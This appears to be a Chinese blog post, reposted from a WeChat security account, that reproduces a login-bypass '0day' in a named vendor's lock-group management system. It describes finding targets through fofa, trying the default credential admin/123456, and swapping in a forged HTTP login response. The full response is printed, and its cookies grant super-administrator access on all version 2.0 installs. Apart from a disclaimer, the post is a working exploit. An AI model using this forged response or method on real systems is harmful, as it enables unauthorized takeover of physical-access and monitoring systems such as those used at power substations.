漏洞复现-某系统0day

免责声明：

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任。切勿用于未授权测试！本文主要来自日常学习记录！

漏洞简介：

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。

复现原理：

在登陆处由于只进行了前端验证，造成用户可以伪造前端的返回包内容来绕过登录，进而进入后台接管后台权限。

复现过程：

首先fofa一个系统，大概长下面这样：

尝试弱口令登录（admin/123456）:

这里注意到登录成功的返回包里似乎都是固定值，并没有随机的cookie产生，所以直接尝试把这个正确的返回包去替换其他网站的登陆包：

看到下面的登录是账号密码错误：

在登录的时候直接抓包替换返回包：

替换下面的数据为：

HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Sat, 05 Jun 2021 01:36:06 GMTConnection: closeContent-Length: 1
0

放包后登录成功：

经过测试发现，可以通杀2.0版本。

本文始发于微信公众号（Fight Tigers Team）：漏洞复现-某系统0day